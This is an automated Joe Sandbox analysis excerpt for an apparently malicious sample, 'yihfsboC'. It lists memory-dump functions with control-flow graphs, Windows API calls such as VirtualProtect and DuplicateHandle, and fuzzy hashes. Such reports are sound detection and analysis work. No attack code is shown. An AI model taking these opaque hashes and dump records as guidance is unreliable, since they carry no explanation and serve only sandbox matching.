                                                                                                                  control_flow_graph 2060 29b5cad0-29b5cbab DuplicateHandle 2061 29b5cbb4-29b5cbf4 2060->2061 2062 29b5cbad-29b5cbb3 2060->2062 2062->2061
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 29B5CB9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 872c6f98cce317ce42c6c47f34cb3f92c574fb5e6aed75e7862348ebb89e35d0
                                                                                                                  • Instruction ID: dfa62be4549152b9713c10dc0ed6802019176d0a2a787d1c67a5b29349468fa6
                                                                                                                  • Opcode Fuzzy Hash: 872c6f98cce317ce42c6c47f34cb3f92c574fb5e6aed75e7862348ebb89e35d0
                                                                                                                  • Instruction Fuzzy Hash: D44144B9D002589FCB10CFAAD984ADEBBF5BB09310F24906AE918BB310D335A945CF54
                                                                                                                  Function 29B5D6DC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2066 29b5d6dc-29b5ddb4 2069 29b5de64-29b5de84 call 29b5993c 2066->2069 2070 29b5ddba-29b5ddbf 2066->2070 2077 29b5de87-29b5de94 2069->2077 2072 29b5ddc1-29b5ddf8 2070->2072 2073 29b5de12-29b5de4a CallWindowProcW 2070->2073 2079 29b5de01-29b5de10 2072->2079 2080 29b5ddfa-29b5de00 2072->2080 2075 29b5de53-29b5de62 2073->2075 2076 29b5de4c-29b5de52 2073->2076 2075->2077 2076->2075 2079->2077 2080->2079
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 29B5DE39
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: bed336a0f6e788d08632d085b4e726073d1d666a5bef5b8898de080fc0abea12
                                                                                                                  • Instruction ID: e9450c4f3567ee0134d3220d90dbda15afe94c016c9d2d6879ca8d2fd9736292
                                                                                                                  • Opcode Fuzzy Hash: bed336a0f6e788d08632d085b4e726073d1d666a5bef5b8898de080fc0abea12
                                                                                                                  • Instruction Fuzzy Hash: 164128B89003458FCB14CF99C484B9ABBF5FF98314F25C559D519AB361D774A842CFA0
                                                                                                                  Function 2417F368 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2083 2417f368-2417f41c VirtualProtect 2086 2417f425-2417f46d 2083->2086 2087 2417f41e-2417f424 2083->2087 2087->2086
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 2417F40C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2534518918.0000000024170000.00000040.00000800.00020000.00000000.sdmp, Offset: 24170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_24170000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 6068b19535d7203b369e367804f675a9389ca60f6d6c433e25c598edfa23614b
                                                                                                                  • Instruction ID: 236b6efc21eefd8882fabfd9cbcf453e8f8cb020d0e3000e74f1da2454d1d574
                                                                                                                  • Opcode Fuzzy Hash: 6068b19535d7203b369e367804f675a9389ca60f6d6c433e25c598edfa23614b
                                                                                                                  • Instruction Fuzzy Hash: 903197B8D012489FCB14DFA9D980A9EFBB1AB49310F20942AE815B7210D735A945CF54
                                                                                                                  Function 29B5777C Relevance: 1.6, APIs: 1, Instructions: 88timeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2092 29b5777c-29b5e0cb SetTimer 2094 29b5e0d4-29b5e106 2092->2094 2095 29b5e0cd-29b5e0d3 2092->2095 2095->2094
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(00000000,?,?,00000000), ref: 29B5E0BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: 3a6fe7770b86df32a01b9eba2437fb60df86d564c3dd0e4570dfe854096b3536
                                                                                                                  • Instruction ID: e86aec68b765123098ba1c1acc13c4a9cc7b6e142cc3976ca9cea34d5374b2e4
                                                                                                                  • Opcode Fuzzy Hash: 3a6fe7770b86df32a01b9eba2437fb60df86d564c3dd0e4570dfe854096b3536
                                                                                                                  • Instruction Fuzzy Hash: 953187B8D04258AFCB10CFA9D580A9EFBF5EB49310F14902AE818BB310D375A945CFA4
                                                                                                                  Function 29B5E019 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2098 29b5e019-29b5e0cb SetTimer 2099 29b5e0d4-29b5e106 2098->2099 2100 29b5e0cd-29b5e0d3 2098->2100 2100->2099
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(00000000,?,?,00000000), ref: 29B5E0BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: fb5be4f5fa6dfa6c5e76f5ad97422d5f2584a5d46fef015c6531e6dab4b97a55
                                                                                                                  • Instruction ID: 41c66f24d0c67dbf71b30c9f7a087c114454aa6d4474f63a546ed7903beeb6a4
                                                                                                                  • Opcode Fuzzy Hash: fb5be4f5fa6dfa6c5e76f5ad97422d5f2584a5d46fef015c6531e6dab4b97a55
                                                                                                                  • Instruction Fuzzy Hash: 6D3188B9D00258AFCB14CFA9D580A9EFBF1AB09310F14902AE818BB310D375A945CF54
                                                                                                                  Function 29B577CC Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?), ref: 29B59172
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: e416662c7e2bc20a226618a52251ffbad54191a90f0d316155609d73bfbecf15
                                                                                                                  • Instruction ID: 5aeef233d9e0d6aa04f2d7b5de67ccc62a3f2fdf341f53c050ab2d0d6a08fc75
                                                                                                                  • Opcode Fuzzy Hash: e416662c7e2bc20a226618a52251ffbad54191a90f0d316155609d73bfbecf15
                                                                                                                  • Instruction Fuzzy Hash: F931CDB4D002599FCB14CFAAD584ADEFBF5AF49310F14906AE818B7320D374A942CFA4
                                                                                                                  Function 29B590D9 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?), ref: 29B59172
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 7298a4a93a234a4e65fcbb9da8ecdfc796b44f74154d9b7ce8fb60dc01437d5c
                                                                                                                  • Instruction ID: 7c983fc7340aaeacb9adc0d4bf428121d83d5a604ecefc8db1c5e6291cf6602b
                                                                                                                  • Opcode Fuzzy Hash: 7298a4a93a234a4e65fcbb9da8ecdfc796b44f74154d9b7ce8fb60dc01437d5c
                                                                                                                  • Instruction Fuzzy Hash: B63198B4D002599FCB14CFAAD984ADEFBF1AF49310F14906AE818B7360D374A946CF64
                                                                                                                  Function 29C4A4EC Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 29C4B733
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544849734.0000000029C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 29C40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29c40000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 3613ebe29490aaecde87e7d03d01cf5fc267d7b7643fce12a35314360cf533a0
                                                                                                                  • Instruction ID: 0aa79e1e21da7656dc034742ecf9b60f38e3bbf1f90bada034797a2318b151bb
                                                                                                                  • Opcode Fuzzy Hash: 3613ebe29490aaecde87e7d03d01cf5fc267d7b7643fce12a35314360cf533a0
                                                                                                                  • Instruction Fuzzy Hash: 1231AEB8D042099FCB14CFAAD584ADEFBF4AF49320F14906AE818B7350D335A941CFA5
                                                                                                                  Function 29C4B6B7 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 29C4B733
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544849734.0000000029C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 29C40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29c40000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 7118c353f643c181a7565baf66ec7fec9a2b82ffdbe465d60e7cc123b381bb5c
                                                                                                                  • Instruction ID: 130a52a77536faa9af88df10b255be192470320e6c9e7c7a37df96d4145e23fa
                                                                                                                  • Opcode Fuzzy Hash: 7118c353f643c181a7565baf66ec7fec9a2b82ffdbe465d60e7cc123b381bb5c
                                                                                                                  • Instruction Fuzzy Hash: EE218CB9D002499FCB14CFA9D584ADEFBF4AF49320F24906AE818B7350D335A941CF65
                                                                                                                  Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString_malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 959018026-0
                                                                                                                  • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                  • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                  • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                  • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                  Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 10892065-0
                                                                                                                  • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                  • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                  • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                  • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                  Function 2417F638 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2534518918.0000000024170000.00000040.00000800.00020000.00000000.sdmp, Offset: 24170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_24170000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: cdd0bdb6e6f6f80aec982d426ddb2350ebba195dde37d720ad84a2f68e910214
                                                                                                                  • Instruction ID: 4a91df89ea52a21c7822d6a99e4ccacf3a1e109ec7ff14e97becaee23793dac3
                                                                                                                  • Opcode Fuzzy Hash: cdd0bdb6e6f6f80aec982d426ddb2350ebba195dde37d720ad84a2f68e910214
                                                                                                                  • Instruction Fuzzy Hash: 8031AAB4D012189FCB14DFAAD981A9EFBF4AF49310F10942AE815B7350CB35A901CFA4
                                                                                                                  Function 29931BD0 Relevance: .4, Instructions: 383COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 91d32f7c62ae128a6c60edf6dfcd6d4848c015c3204678b8aa2dbbd4315adf29
                                                                                                                  • Instruction ID: 85fff11333a970ee281faca78f1349af92d286a709b679f24b44e9d690d48158
                                                                                                                  • Opcode Fuzzy Hash: 91d32f7c62ae128a6c60edf6dfcd6d4848c015c3204678b8aa2dbbd4315adf29
                                                                                                                  • Instruction Fuzzy Hash: 4BD1C434B042048FD729CF78C494AAD7BB6EF89320F6441AAD545DB3B1DA31DC46CBA5
                                                                                                                  Function 29953B52 Relevance: .2, Instructions: 220COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9a971a926a5ce97bb0cfe0fc2cf1d43f8b8fa8a751e3f450ef71507b9efcf35
                                                                                                                  • Instruction ID: 1e655e0a0b37a6dc8575b52a4e4c916c95adbb8a3401e7abd60e2b9ba3e192d6
                                                                                                                  • Opcode Fuzzy Hash: b9a971a926a5ce97bb0cfe0fc2cf1d43f8b8fa8a751e3f450ef71507b9efcf35
                                                                                                                  • Instruction Fuzzy Hash: 31818E34A00205DFCB44DF79C88596FBBF2BF89324B1581AAD906DB365D732E842CB91
                                                                                                                  Function 29953808 Relevance: .2, Instructions: 220COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa120496459e1472d5d164a33a43ce9123c680d660ec02431cfc042089aaabd4
                                                                                                                  • Instruction ID: aa344a310fde5b0cf1d6f955a74d20236efb4eec20fb2382ff177c295c0af775
                                                                                                                  • Opcode Fuzzy Hash: fa120496459e1472d5d164a33a43ce9123c680d660ec02431cfc042089aaabd4
                                                                                                                  • Instruction Fuzzy Hash: AB71EE34704205CFE70D9B75C895B2F7BAAAF88360B148169D646CB394EF39CC478B90
                                                                                                                  Function 29932648 Relevance: .2, Instructions: 212COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f605603da6cde39172b143d20b923d753011b80014cde62de4337aa149c963bc
                                                                                                                  • Instruction ID: a5e9e5fbdea586094498841d9e3403f10ec809b625b24164cae9fe80d1478189
                                                                                                                  • Opcode Fuzzy Hash: f605603da6cde39172b143d20b923d753011b80014cde62de4337aa149c963bc
                                                                                                                  • Instruction Fuzzy Hash: 6761FE75B002459FC7189F79D840A9EBBF9FFC8730B64857AE599C7250D730E8028BA0
                                                                                                                  Function 29954640 Relevance: .2, Instructions: 195COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 76cee08f882c9779012a5e26ec1bbb85189aab13d0722595b17e7a8755995fc9
                                                                                                                  • Instruction ID: 78e89c02fb974aea42d4c998be938f62981764e51896cf4dfb2ff06d4f9a8ab2
                                                                                                                  • Opcode Fuzzy Hash: 76cee08f882c9779012a5e26ec1bbb85189aab13d0722595b17e7a8755995fc9
                                                                                                                  • Instruction Fuzzy Hash: 49A17F74E00229CFDBA8DF69C854B99BBB1BB89300F1081EAD90DA7355DB309E85CF11
                                                                                                                  Function 299316CA Relevance: .2, Instructions: 191COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 87409612767939e7c2dee4c57109d8264f426e741946f464132a0ae87c3fff1e
                                                                                                                  • Instruction ID: e8b63983feb8e9d2559f401c22b64c5d6609ccdeb9eacc7c9e9704c8b147e095
                                                                                                                  • Opcode Fuzzy Hash: 87409612767939e7c2dee4c57109d8264f426e741946f464132a0ae87c3fff1e
                                                                                                                  • Instruction Fuzzy Hash: 58613A34B043448FDB295F74945825D3BA6AFC1370F64866EE9928B3E1CE388D46CB5A
                                                                                                                  Function 29953690 Relevance: .2, Instructions: 186COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2452c5d0899df7f527c38c44a5aa473dcc7667ea24b7e4afef1bc0ecb30f055d
                                                                                                                  • Instruction ID: 0a8c467005373e960c585bac72baa891552d3266e236f7777e33cbd84b412d30
                                                                                                                  • Opcode Fuzzy Hash: 2452c5d0899df7f527c38c44a5aa473dcc7667ea24b7e4afef1bc0ecb30f055d
                                                                                                                  • Instruction Fuzzy Hash: EC61DE75704255DFDB09CF64C845A6B7BFAFF88310F1485A9E5868B2A1EB38C806CB91
                                                                                                                  Function 29951D22 Relevance: .2, Instructions: 180COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e9c15791c9aa1961215caa7fd870bf8de02b6a33ff9cdcc72efc67df3fae6ec
                                                                                                                  • Instruction ID: efd1e299afaeebec0ea8511d58425b9e5476bc7f20940012e0746819bd503f70
                                                                                                                  • Opcode Fuzzy Hash: 6e9c15791c9aa1961215caa7fd870bf8de02b6a33ff9cdcc72efc67df3fae6ec
                                                                                                                  • Instruction Fuzzy Hash: 2A91CF74E412298BDB64DF69C894BEDBBF2AF99300F1081E9D51DA7290EB345E85CF40
                                                                                                                  Function 29954597 Relevance: .2, Instructions: 173COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b83ce3568ab8a6290b245c7c3602507fbdecbf11ff514756dbbfd47beb38ca6b
                                                                                                                  • Instruction ID: 67c66c84e35c4d4b171192c4387d4117e7f4cb1aeeb9c846b79f902d7e54d607
                                                                                                                  • Opcode Fuzzy Hash: b83ce3568ab8a6290b245c7c3602507fbdecbf11ff514756dbbfd47beb38ca6b
                                                                                                                  • Instruction Fuzzy Hash: A2817174E012288FDB68DF69C954B9EBBF2BB89200F1081EAD54DA7355DB305E85CF21
                                                                                                                  Function 29953F10 Relevance: .2, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e37373410e330d788533624991f8efb949274af6bea2052d39fb637756b17aa
                                                                                                                  • Instruction ID: 61a0e52700f079873d0dadb5929d890a6febe7889e78710f47f9697c58f13bb8
                                                                                                                  • Opcode Fuzzy Hash: 5e37373410e330d788533624991f8efb949274af6bea2052d39fb637756b17aa
                                                                                                                  • Instruction Fuzzy Hash: EF512874608111CFC748DF78E894D6B3BF5BB5A3A071140A4E40AEB3A1DB38EC86CB90
                                                                                                                  Function 2995463F Relevance: .2, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a9c0a2801016445e8c635abb3d21c6049cfc45f9d99d1293850b282e234538a3
                                                                                                                  • Instruction ID: 6e5dd7d8bc23278beae7fb5b99037e208d13f974856e0313fd52833153557bca
                                                                                                                  • Opcode Fuzzy Hash: a9c0a2801016445e8c635abb3d21c6049cfc45f9d99d1293850b282e234538a3
                                                                                                                  • Instruction Fuzzy Hash: 90818074E002288FDB68DF69C854B99BBF2BB89300F1081EAD90DA7354DB309E85CF11
                                                                                                                  Function 299562A0 Relevance: .2, Instructions: 155COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d93b50fb3f78cd0501d5e4031cf2fe27a33437c7c01e429f001f6b2f58821fbd
                                                                                                                  • Instruction ID: 16181ac9db04bc481a7685e116881ba3716b578ecb4cc622df239c24903e81c9
                                                                                                                  • Opcode Fuzzy Hash: d93b50fb3f78cd0501d5e4031cf2fe27a33437c7c01e429f001f6b2f58821fbd
                                                                                                                  • Instruction Fuzzy Hash: 8071B374E412298FDB64DF69CD94BDDBBB2AF89300F1080EAD919A7254EB315E818F50
                                                                                                                  Function 2995547F Relevance: .1, Instructions: 148COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4366f5288a91c638ec63ea9850a11bbee01abffdaf99c108e4eacadbbd17f43f
                                                                                                                  • Instruction ID: 5c9d397a8cc247c0c7eda5a08c9fcd2964fd6e914aab5e4d08112845434d4283
                                                                                                                  • Opcode Fuzzy Hash: 4366f5288a91c638ec63ea9850a11bbee01abffdaf99c108e4eacadbbd17f43f
                                                                                                                  • Instruction Fuzzy Hash: 3961C474E412298FEB64DF65CD50BDEBBB2AF89300F1080EAD919B7294DB315E819F40
                                                                                                                  Function 2995C820 Relevance: .1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
